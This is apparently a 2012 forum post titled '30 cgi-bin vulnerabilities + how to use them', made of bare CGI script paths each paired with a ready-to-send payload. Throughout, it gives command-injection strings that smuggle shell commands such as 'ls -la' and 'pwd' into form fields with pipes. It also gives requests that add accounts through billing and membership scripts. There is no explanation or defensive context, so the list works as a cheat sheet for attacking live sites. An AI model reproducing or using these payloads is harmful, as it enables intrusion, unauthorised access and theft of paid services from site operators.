China Network Penetration Testing Alliance
Title: 30 cgi-bin vulnerabilities + how to use them
Author: admin
Time: 2012-9-13 16:55
==============================
/smspass.pl
username=username&password=password
/index.cgi
wei=ren&gen=command
/passmaster.cgi
Action=Add&Username=Username&Password=Password
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
/ccbill-local.asp
post_values=username:password
/count.cgi
pinfile=|echo;ls -la;exit|
/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
/af.cgi
_browser_out=|echo;ls -la;exit;|
/modify.cgi
username=username&password=password&expire=30
/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|
/gx9passwd.cgi
cmd=ADD&user=username&pass=password
/probecontrol.cgi
command=enable&username=username&password=password
/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit
/htadd.pl
configfile=|echo; ls -alt; exit
/gx9passwd.cgi
cmd=ADD&user=username&pass=password
/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password
/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)
/globill_ut.cgi
do=add&username=username&password=password&wpassword=password
/usercontrol.cgi
command=enable&username=USER&password=PASS
/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password
/addusr.pl
user=USER&pass=PASS&confirm=PASS
/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
/af.cgi
/env.cgi
ADD+;echo;pwd;exit
/count.cgi
pinfile=|echo;pwd;exit|
/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|
/add.cgi
username=username&password=password&expire=30
==============================